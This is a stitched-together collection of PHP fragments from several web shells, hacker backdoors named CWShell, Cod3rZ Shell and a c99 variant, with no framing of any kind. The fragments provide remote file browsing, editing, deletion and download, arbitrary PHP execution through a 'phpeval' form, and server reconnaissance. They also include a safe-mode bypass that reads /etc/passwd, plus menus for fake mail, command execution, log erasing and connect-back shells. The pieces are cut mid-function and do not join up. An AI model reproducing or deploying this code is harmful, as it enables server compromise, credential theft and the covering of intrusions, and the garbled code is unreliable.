echo "</b><br>Select action/file-type:<br>"; foreach ($arr as $t) { if ($t[1] == $rft) { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><font color=\"green\">" . $t[0] . "</font></a>"; } elseif ($t[1] == $ft) { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>"; } echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b>"; echo "<table class=tab border=0 cellspacing=1 cellpadding=2>"; echo "<tr class=tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr>"; echo "<tr class=tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr class=tr><td><b>Owner/Group</b></td><td> "; $tmp = posix_getpwuid(fileowner($d . $f)); if (!isset($tmp['name']) || $tmp['name'] == "") { echo fileowner($d . $f) . " "; } else { echo $tmp['name'] . " "; } $tmp = posix_getgrgid(filegroup($d . $f)); if (!isset($tmp['name']) || $tmp['name'] == "") { echo filegroup($d . $f); } else { echo $tmp['name']; }
echo "</b><br>" . ws(2); echo "ÇáÏæÇá ÇáããäæÚÉ : <b>"; if ('' == ($df = @ini_get('disable_functions'))) { echo "<font color=#00800F>áÇíæÌÏ</font></b>"; } else { echo "<font color=red>{$df}</font></b>"; } $free = @diskfreespace($dir); if (!$free) { $free = 0; } $all = @disk_total_space($dir); if (!$all) { $all = 0; } echo "<br>" . ws(2) . "ÇáãÓÇÍÉ ÇáÎÇáíå : <b>" . view_size($free) . "</b> ÇáãÓÇÍÉ ÇáßáíÉ: <b>" . view_size($all) . "</b>"; echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#2279D9> <tr><td align=right width=100>'; echo $font; if ($unix) { echo '<font color=#CCCCCC><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=tahoma size=-2 color=#2279D9><b>"; echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; echo ws(3) . $sysctl . "<br>"; echo ws(3) . ex('echo $OSTYPE') . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; if (!empty($id)) { echo ws(3) . $id . "<br>"; } else {
echo "</b><br>" . ws(2); echo "Disable functions : <b>"; if ('' == ($df = @ini_get('disable_functions'))) { echo "<font color=green>NONE</font></b>"; } else { echo "<font color=red>{$df}</font></b>"; } $free = @diskfreespace($dir); if (!$free) { $free = 0; } $all = @disk_total_space($dir); if (!$all) { $all = 0; } echo "<br>" . ws(2) . "Free space : <b>" . view_size($free) . "</b> Total space: <b>" . view_size($all) . "</b>"; echo '</font></td></tr><table> <table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> <tr><td align=right width=100>'; echo $font; if ($unix) { echo '<font color=blue><b>uname -a :' . ws(1) . '<br>sysctl :' . ws(1) . '<br>$OSTYPE :' . ws(1) . '<br>Server :' . ws(1) . '<br>id :' . ws(1) . '<br>pwd :' . ws(1) . '</b></font><br>'; echo "</td><td>"; echo "<font face=Verdana size=-2 color=red><b>"; echo !empty($uname) ? ws(3) . @substr($uname, 0, 120) . "<br>" : ws(3) . @substr(@php_uname(), 0, 120) . "<br>"; echo ws(3) . $sysctl . "<br>"; echo ws(3) . ex('echo $OSTYPE') . "<br>"; echo ws(3) . @substr($SERVER_SOFTWARE, 0, 120) . "<br>"; if (!empty($id)) { echo ws(3) . $id . "<br>"; } else {
} $arr = array(array("[hex]", "info"), array("[html]", "html"), array("[txt]", "txt"), array("[Code]", "code"), array("[Session]", "phpsess"), array("[exe]", "exe"), array("[SDB]", "sdb"), array("[gif]", "img"), array("[ini]", "ini"), array("[download]", "download"), array("[rtf]", "notepad"), array("[change]", "edit")); echo "<b>Viewing file: [{$ext}] " . $f . " (" . view_size(filesize($d . $f)) . ") " . view_perms_color($d . $f) . "</b><br>Select action/file-type:<br>"; foreach ($arr as $t) { if ($t[1] == $rft) { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><font color=green>" . $t[0] . "</font></a>"; } elseif ($t[1] == $ft) { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b><u>" . $t[0] . "</u></b></a>"; } else { echo " <a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&d=" . urlencode($d) . "\"><b>" . $t[0] . "</b></a>"; } echo " (<a href=\"" . $surl . "act=f&f=" . urlencode($f) . "&ft=" . $t[1] . "&white=1&d=" . urlencode($d) . "\" target=\"_blank\">+</a>) |"; } echo "<hr size=\"1\" noshade>"; if ($ft == "info") { echo "<b>Information:</b><table border=0 cellspacing=1 cellpadding=2><tr><td><b>Path</b></td><td> " . $d . $f . "</td></tr><tr><td><b>Size</b></td><td> " . view_size(filesize($d . $f)) . "</td></tr><tr><td><b>MD5</b></td><td> " . md5_file($d . $f) . "</td></tr>"; if (!$win) { echo "<tr><td><b>Owner/Group</b></td><td> "; $ow = posix_getpwuid(fileowner($d . $f)); $gr = posix_getgrgid(filegroup($d . $f)); echo ($ow["name"] ? $ow["name"] : fileowner($d . $f)) . "/" . ($gr["name"] ? $gr["name"] : filegroup($d . $f)); } echo "<tr><td><b>Perms</b></td><td><a href=\"" . $surl . "act=chmod&f=" . urlencode($f) . "&d=" . urlencode($d) . "\">" . view_perms_color($d . $f) . "</a></td></tr><tr><td><b>Create time</b></td><td> " . date("d/m/Y H:i:s", filectime($d . $f)) . "</td></tr><tr><td><b>Access time</b></td><td> " . date("d/m/Y H:i:s", fileatime($d . $f)) . "</td></tr><tr><td><b>MODIFY time</b></td><td> " . date("d/m/Y H:i:s", filemtime($d . $f)) . "</td></tr></table><br>"; $fi = fopen($d . $f, "rb"); if ($fi) { if ($fullhexdump) { echo "<b>FULL HEXDUMP</b>"; $str = fread($fi, filesize($d . $f)); } else { echo "<b>HEXDUMP PREVIEW</b>"; $str = fread($fi, $hexdump_lines * $hexdump_rows);
$filew++; $listz = "/" . $list; if (eregi($page, $listz)) { @($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana color=yellow>' . $list . '<td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'); } elseif (eregi('config', $listz) && eregi('.php', $listz)) { @($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana><b>' . $list . '</b><td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'); } else { @($listf .= '<tr><td valign=top><img src=?com=image&img=file><font size=2 face=Verdana>' . $list . '<td valign=top><font size=2 face=Verdana>' . $typezz . '</td><td valign=top width=15%><font size=2 face=Verdana>' . $lolx . ' Kb</td><td valign=top><font size=2 face=Verdana>' . getperms($list) . '</font></tr>'); } } } closedir($open); } $fileq = $pahtw + $filew; } echo "<html>\n<head><title>{$site} ~ CWShéLL - Edited By KingDefacer</title>\n<style>\ntable.menu {\nborder-width: 0px;\n border-spacing: 1px;\n border-style: solid;\n border-color: #a6a6a6;\n border-collapse: separate;\n background-color: rgb(98, 97,97);\n}\ntable.menuz {\nborder-width: 0px;\n border-spacing: 1px;\n border-style: solid;\n border-color: #a6a6a6;\n border-collapse: separate;\n background-color: rgb(98, 97,97);\n}\ntable.menu td {\n border-width: 1px;\n padding: 1px;\n border-style: none;\n border-color: #333333;\n background-color: #000000;\n -moz-border-radius: 0px;\n}\ntable.menuz tr {\n border-width: 1px;\n padding: 1px;\n border-style: none;\n border-color: #333333;\n background-color: #000000;\n -moz-border-radius: 0px;\n}\n\ntable.menuz tr:hover {\n\tbackground-color: #111111;\n}\ninput,textarea,select {\nfont: normal 11px Verdana, Arial, Helvetica, sans-serif;\nbackground-color:black;\ncolor:#a6a6a6;\nborder: solid 1px #363636;\n}\n</style>\n</head>\n<body bgcolor='#000000' text='#ebebeb' link='#ebebeb' alink='#ebebeb' vlink='#ebebeb'>\n<table style='background-color:#333333; border-color:#a6a6a6' width=100% border=0 align=center cellpadding=0 cellspacing=0>\n<tr><td>\n<center><b><font size='6' face='Webdings'>ü</font>\n<font face='Verdana' size='5'><a href='" . @$_SERVER['HTTP_REFERER'] . "'>~ CWShell ~</font></a>\n<font size='6' face='Webdings'>ü</font></b>\n</center>\n</td></tr></table><table class=menu width=100%<tr><td>\n<font size='1' face='Verdana'><b>Site: </b><u>{$site}</u> <br>\n<b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br>\n<b>Server Bilgisi : </b> <u>{$info}</u> <br>\n<b>Uname -a:</b> <u>{$uname}</u> <br>\n<b>Klasör:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br>\n<b>Safe Mode:</b> <u>{$safemode}</u> <br>\n<b>Sihirli Sozler:</b> <u>{$quot}</u> <br>\n<b>Sayfa:</b> <u>{$page}</u><br>\n<b>Boþ Alan:</b> <u>" . view_size($free) . " [ {$percentfree}% ]</u> <br>\n<b>Toplam Alan:</b> <u>" . view_size($all) . "</u> <br>\n<b>IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] . "</u> - Server IP:</b> <a href='http://whois.domaintools.com/" . $_SERVER['SERVER_ADDR'] . "'>" . $_SERVER['SERVER_ADDR'] . "</a></td></tr>\n<tr><td><form method='post' action=''>\n<center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' value='Cmd Execution' name='commex'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></center></td></tr>"; // Safe Mode Bypass if (isset($_POST['safemodz'])) { echo "<tr><td valign=top width=50%>\n<center><b><font size='2' face='Verdana'>Safe-Mode Bypass[Dosyalar]<br></font></b>\n<form action='' method='post'>\n <font size='1' face='Verdana'>Dosya adý:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Dosyayý Oku' name='redfi'><br>\n\t </td><tr>\n<td valign=top>\n<center><b><font size='2' face='Verdana'>Safe-Mode Bypass [Klasörler]<br></font></b>\n <form method='post' action=''>\n <font size='1' face='Verdana'>Klasör:</font><br>\n <input type='text' name='directory'> <input type='submit' value='Listele' name='reddi'>"; } // Safe Mode Bypass: File if (isset($_POST['redfi'])) { $test = ''; $tempp = tempnam($test, "cx"); $get = htmlspecialchars($_POST['filew']); if (copy("compress.zlib://" . $get, $tempp)) { $fopenzo = fopen($tempp, "r"); $freadz = fread($fopenzo, filesize($tempp)); fclose($fopenzo); $source = htmlspecialchars($freadz); echo "<tr><td><center><font size='1' face='Verdana'>{$get}</font><br><textarea rows='20' cols='80' name='source'>{$source}</textarea>";
//UP Directory if (basename($dir[$i]) === "..") { $tmp = explode('/', getcwd()); $new = ""; for ($j = 0; $j < count($tmp) - 1; $j++) { $new .= $tmp[$j] . "/"; } print "<tr><td><a href=\"" . $patch . "?dir=" . $new . "\">UP</a></td></tr>\n"; } print "</tr>\n"; $perms_unix = get_perms($dir[$i], 1); $perms_num = get_perms($dir[$i], 2); //è un FILE if (is_file($dir[$i])) { if (basename($dir[$i]) != '..') { print "<tr><td><a href=\"" . $patch . "?view_file=" . $dir[$i] . "\">" . $dir[$i] . "</a></td>\n" . "<td>" . view_size(@filesize($dir[$i])) . "</td>\n" . "<td><u><a href=\"?action=chmod&file=" . $dir[$i] . "&perms=" . $perms_num . "\">" . $perms_unix . " - " . $perms_num . "</a></u></td>\n" . "<td><a href=\"" . $patch . "?edit_file=" . $dir[$i] . "\">Edit</a> - \n \t\t\t <a href=\"" . $patch . "?remove_file=" . $dir[$i] . "\">Del</a> - \n \t\t\t <a href=\"" . $patch . "?download_file=" . $dir[$i] . "\">Down</a> - \n \t\t\t <a href=\"" . $patch . "?hexdump_file=" . $dir[$i] . "\">HEXDUMP</a></td>\n" . "</tr>\n"; } } //è una CARTELLA if (is_dir($dir[$i])) { if (basename($dir[$i]) != '..') { print "<tr><td><a href=\"" . $patch . "?dir=" . $dir[$i] . "\">[ " . $dir[$i] . " ]</td>\n" . "<td>DIR</td>\n" . "<td><u><a href=\"?action=chmod&file=" . $dir[$i] . "&perms=" . $perms_num . "\">" . $perms_unix . " - " . $perms_num . "</a></u></td>\n" . "<td><a href=\"" . $patch . "?rmdir=" . $dir[$i] . "\">Del</a>\n" . "</tr>\n"; } } } print "\n</table>"; ?> <br /> <table> <tr> <td valign='top'>
function disp_freespace($curdrv) { $free = disk_free_space($curdrv); $total = disk_total_space($curdrv); if ($free === FALSE) { $free = 0; } if ($total === FALSE) { $total = 0; } if ($free < 0) { $free = 0; } if ($total < 0) { $total = 0; } $used = $total - $free; $free_percent = round(100 / ($total / $free), 2) . "%"; $free = view_size($free); $total = view_size($total); return "{$free} of {$total} ({$free_percent})"; }
if (!is_readable(FILECONFIG) or is_dir(FILECONFIG) || !is_readable(FILEACCOUNT) or is_dir(FILEACCOUNT)) { foreach ($settingfile as $file) { if (file_exists($file)) { $buffer_TEXT .= "<b>Permision denied (" . htmlspecialchars($file) . ")!</b>"; } else { $buffer_TEXT .= '<b>' . $file . ' does not exists.</b><br />'; } } unset($file); } else { $close_config_page = false; $styledisplay = ' style="display:none;"'; $showpostn = false; $iserr = false; foreach ($settingfile as $file) { $buffer_TEXT .= "<b>File: " . basename($file) . " (" . view_size(filesize($file)) . ") attrib: " . view_perms_color($file) . "</b><br />"; } unset($file); $buffer_TEXT .= "You're logged with IP: <b class='g'>" . $visitors->userip . "</b><br /><hr width='800%' />"; if (isset($_POST['submit']) && $_POST['setupsave'] == 1) { #============= WRITE CONFIG ================ # Final filter to write config # Filter level 2; check strict value; raise error if value not valid if ($task == 'editor') { $edt = $_POST['edit_text']; $sfile = $_POST['file']; if (!write_file($sfile, $edt, 1)) { $buffer_TEXT .= "<b class='a'>Can't write to file!</b>"; } else { $buffer_TEXT .= "<b style='color:#00FF33'>Saved!</b>"; // $r = $edt;
if (@($dh = opendir(chr($j) . ":/"))) { $content .= '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>'; } } $content .= "</td></tr>"; } $content .= "<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>"; for ($i = 0; $i < count($dire); $i++) { $link = $dir . $dire[$i]; $content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td> <td>dir</td><td></td><td>' . perms($link) . '</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; } for ($i = 0; $i < count($files); $i++) { $linkfile = $dir . $files[$i]; $content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td> <td>file</td><td>' . view_size(filesize($linkfile)) . '</td><td>' . perms($linkfile) . '</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; } $content .= "</table>"; } } } //downloader if ($action == 'download') { header('Content-Length:' . filesize($file) . ''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $file . '"'); readfile($file); } //phpeval if ($action == 'phpeval') {
function scandire($dir) { if (empty($dir)) { $dir = getcwd(); } $dir = chdir($dir) or die('<font color="red">cannot chdir!</font> open_basedir/safe_mode on?<br><br>' . $pageend . ''); $dir = getcwd() . "/"; $dir = str_replace("\\", "/", $dir); if (is_dir($dir)) { if ($dh = opendir($dir)) { while (($file = readdir($dh)) !== false) { if (filetype($dir . $file) == "dir") { $dire[] = $file; } if (filetype($dir . $file) == "file" || filetype($dir . $file) == "link" || filetype($dir . $file) == "socket") { $files[] = $file; } // if(filetype($dir.$file)=="") $files[]=$file; //debug: strange behavior of filetype() with openbasedir, it returns "" // if(filetype($dir.$file)=="link") $files[]=$file; // echo "file = ".$file." (".filetype($file).")<br>"; #debug // if (is_link($file)) { echo " -> ".readlink($file); }; #debug } closedir($dh); @sort($dire); @sort($files); echo "<table border>"; echo '<tr><td><form method="post" action="' . $_SERVER['PHP_SELF'] . '"><input name="p" type="hidden" value="f">go to dir:<input type="text" name="dir" value="' . $dir . '" size="30"><input name="action" type="hidden" value="viewer"><input type="submit" value="Go"></form></td></tr>'; echo "<tr><td>Name</td><td>Type</td><td>Size</td><td>Inode Changed<br>File Modified<br>File Accessed</td><td>Owner<br>Group</td><td>Chmod</td><td>Action</td></tr>"; for ($i = 0; $i < count($dire); $i++) { $link = $dir . $dire[$i]; echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>Dir</td><td>' . view_size(dirsize($link)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($link)) . '<br>' . date("d/m/Y H:i:s", filemtime($link)) . '<br>' . date("d/m/Y H:i:s", fileatime($link)) . '</font></td><td>' . owner($link) . '</td><td>' . substr(sprintf('%o', fileperms($link)), -4) . ' <br>(' . view_perms_color($link, "string") . ')</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Touch">T</a></td></tr>'; } for ($i = 0; $i < count($files); $i++) { $linkfile = $dir . $files[$i]; echo '<tr><td><a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();">' . $files[$i] . '</a>'; echo '<br></td><td>File</td><td>' . view_size(filesize($linkfile)) . '</td><td><font size="-1">' . date("d/m/Y H:i:s", filectime($linkfile)) . '<br>' . date("d/m/Y H:i:s", filemtime($linkfile)) . '<br>' . date("d/m/Y H:i:s", fileatime($linkfile)) . '</font></td><td>' . owner($linkfile) . '</td><td>' . substr(sprintf('%o', fileperms($linkfile)), -4) . ' <br>(' . view_perms_color($linkfile, "string") . ')</td><td> <a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();" title="Download">D</a> <a href="#" onclick="document.editor.filee.value=\'' . $linkfile . '\'; document.editor.files.value=\'' . $linkfile . '\'; document.editor.submit();" title="Edit">E</a> <a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete">x</a> <a href="#" onclick="document.reqs.action.value=\'chmod\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Chmod">C</a> <a href="#" onclick="document.reqs.action.value=\'touch\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Touch">T</a></td></tr></tr>'; } echo "</table>"; } } }
<tr><td> <center><b><font size='6' face='Webdings'>!</font> <font face='Verdana' size='5'><a href='".$_SERVER['HTTP_REFERER']."'>~ Cod3rZ Shell ~</font></a> <font size='6' face='Webdings'>!</font></b> </center> </td></tr></table><table class=menu width=100%<tr><td> <font size='1' face='Verdana'><b>Site: </b><u>$site</u> <br> <b>Server Name: </b><u>" . $_SERVER['SERVER_NAME'] . "</u> <br> <b>Software:</b> <u>$info</u> <br> <b>Uname -a:</b> <u>$uname</u> <br> <b>Path:</b> <u>" . $_SERVER['DOCUMENT_ROOT'] . "</u> <br> <b>Safe Mode:</b> <u>$safemode</u> <br> <b>Magic Quotes:</b> <u>$quot</u> <br> <b>Page:</b> <u>$page</u><br> <b>Free Space:</b> <u>" . view_size($free) . " [ $percentfree% ]</u> <br> <b>Total Space:</b> <u>" . view_size($all) . "</u> <br> <b>Your IP:</b> <u>" . $_SERVER['REMOTE_ADDR'] ."</u> - Server IP:</b> <a href='http://whois.domaintools.com/". $_SERVER['SERVER_ADDR'] ."'>".$_SERVER['SERVER_ADDR']."</a></td></tr> <tr><td><form method='post' action=''> <center><input type=submit value='File List' name=filelist> - <input type=submit value='View PhpInfo' name=phpinfo> - <input type=submit value='Encoder' name='encoder'> - <input type='submit' value='Send Fake Mail' name='mail'> - <input type='submit' name='logeraser' value='Logs Eraser'> - <input type='submit' name='connectback' value='Connect Back'> - <input type='submit' name='safemodz' value='Safe Mode Bypass'> - <input type='submit' name='milw0' value='Milw0rm Search'></form></center></td></tr>"; // Safe Mode Bypass if(isset($_POST['safemodz'])) { echo "<tr><td valign=top width=50%> <center><b><font size='2' face='Verdana'>:: Safe-Mode Bypass [Files] ::<br></font></b> <form action='' method='post'> <font size='1' face='Verdana'>File Name:</font><br> <input type='text' name='filew' value='/etc/passwd'> <input type='submit' value='Read File' name='redfi'></font><br> </td><tr> <td valign=top> <center><b><font size='2' face='Verdana'>:: Safe-Mode Bypass [Directories] ::<br></font></b> <form method='post' action=''>
<b>Fayla Get</b> </font> <form action="<?php echo $surl; ?> "><input type=hidden name=act value="gofile"><input type=hidden name="d" value="<?php echo $dispd; ?> "><input type="text" name="f" size="50" value="<?php echo $dispd; ?> "><font face="Tahoma"> </font><input type=submit value="Get"></form></center></td></tr></table> </td> </tr> </TABLE> <br><TABLE width="100%" height=1 border=1 cellPadding=0 cellSpacing=0 borderColorLight=#c0c0c0 borderColorDark=#666666 bgColor=#330000 style="BORDER-COLLAPSE: collapse"> <tr><td width="990" height="1" valign="top"> <font face="Tahoma"> <?php echo "\n<table border='0' width='100%' cellspacing='0' cellpadding='0'>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Həcm</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>" . view_size($total) . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Sizin Ip'niz</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href=http://" . $_SERVER['REMOTE_ADDR'] . "\n\t\t<font face='Tahoma' size='1' color='#00FF00'>" . $_SERVER['REMOTE_ADDR'] . "</font></td>\n\t</tr>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Həcm</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>" . view_size($free) . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Server</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href=http://" . gethostbyname($_SERVER['HTTP_HOST']) . "\n\t\t<font face='Tahoma' size='1' color='#00FF00'>" . gethostbyname($_SERVER['HTTP_HOST']) . "</font></td>\n\t</tr>\n\t<tr>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Bos Faiz</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>%" . $free_percent . "</font></td>\n\t\t<td><li><font face='Tahoma' size='1' color='#FF0000'>Dəstək Server</font></li></td>\n\t\t<td align='center'><font face='Tahoma' size='1' color='#FF0000'>:</font></td>\n\t\t<td><a href={$dsunucu}\n\t\t<td><font face='Tahoma' size='1' color='#00FF00'>http://www.caspian-pirates.org</font></td>\n\t</tr>\n</table>\n"; ?> </font><hr><p align='center'><font face='Tahoma' size='1'>[ Special 99 Shell v1.0 || Developing by </font> <font face='Tahoma' size='2'> <font color='white'><a href='http://caspian-pirates.org'> <font face="Tahoma"><b>ฬaђเtє_ฬ๏lŦ</b></font></a></font> </font><font face='Tahoma' size='1'> || <a href='http://www.Caspian-Pirates.OrG'> <font face="Tahoma">Caspian-Pirates.OrG</font></a> ]</font></p> </td></tr></table>+ <br/></body></html><?php chdir($lastdir); c99shexit();
$content .= "<tr><td>Select drive:"; for ($j = ord('C'); $j <= ord('Z'); $j++) { if (@($dh = opendir(chr($j) . ":/"))) { $content .= '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>'; } } $content .= "</td></tr>"; } $content .= "<tr><td>Name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>"; for ($i = 0; $i < count($dire); $i++) { $link = $dir . $dire[$i]; $content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . '<a/></td><td>dir</td><td></td><td>' . perms($link) . '</td><td><a href="#" onclick="document.reqs.action.value=\'deletedir\'; document.reqs.file.value=\'' . $link . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; } for ($i = 0; $i < count($files); $i++) { $linkfile = $dir . $files[$i]; $content .= '<tr><td><a href="#" onclick="document.reqs.action.value=\'editor\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.file.value=\'' . $linkfile . '\'; document.reqs.submit();">' . $files[$i] . '</a><br></td><td>file</td><td>' . view_size(filesize($linkfile)) . '</td><td>' . perms($linkfile) . '</td><td><a href="#" onclick="document.reqs.action.value=\'download\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Download">D</a><a href="#" onclick="document.reqs.action.value=\'editor\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Edit">E</a><a href="#" onclick="document.reqs.action.value=\'delete\'; document.reqs.file.value=\'' . $linkfile . '\';document.reqs.dir.value=\'' . $dir . '\'; document.reqs.submit();" title="Delete this file">X</a></td></tr>'; } $content .= "</table>"; } } } //downloader if ($action == "download") { header('Content-Length:' . filesize($file) . ''); header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . $file . '"'); readfile($file); } //phpeval if ($action == "phpeval") { $content .= "<form method=\"POST\">\n <input type=\"hidden\" name=\"action\" value=\"phpeval\">\n <input type=\"hidden\" name=\"dir\" value=\"" . $dir . "\">\n <?php<br>\n <textarea name=\"phpev\" rows=\"5\" cols=\"150\">" . @$_POST['phpev'] . "</textarea><br>\n ?><br>\n <input type=\"submit\" value=\"execute\"></form>";
function scandire($dir) { $dir = chdir($dir); $dir = getcwd() . "/"; $dir = str_replace("\\", "/", $dir); if (is_dir($dir)) { if (@($dh = opendir($dir))) { while (($file = readdir($dh)) !== false) { if (filetype($dir . $file) == "dir") { $dire[] = $file; } if (filetype($dir . $file) == "file") { $files[] = $file; } } closedir($dh); @sort($dire); @sort($files); echo "<table cellSpacing=0 border=1 style=\"border-color:black;\" cellPadding=0 width=\"100%\">"; echo "<tr><td><form method=POST>Open directory:<input type=text name=dir value=\"" . $dir . "\" size=50><input type=submit value=\"GO\"></form></td></tr>"; if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') { echo "<tr><td>Select drive:"; for ($j = ord('C'); $j <= ord('Z'); $j++) { if (@($dh = opendir(chr($j) . ":/"))) { echo '<a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . chr($j) . ':/\'; document.reqs.submit();"> ' . chr($j) . '<a/>'; } } echo "</td></tr>"; } echo "<tr><td>OS: " . @php_uname() . "</td></tr>\n<tr><td>name dirs and files</td><td>type</td><td>size</td><td>permission</td><td>options</td></tr>"; for ($i = 0; $i < count($dire); $i++) { $link = $dir . $dire[$i]; echo '<tr><td><a href="#" onclick="document.reqs.action.value=\'viewer\'; document.reqs.dir.value=\'' . $link . '\'; document.reqs.submit();">' . $dire[$i] . 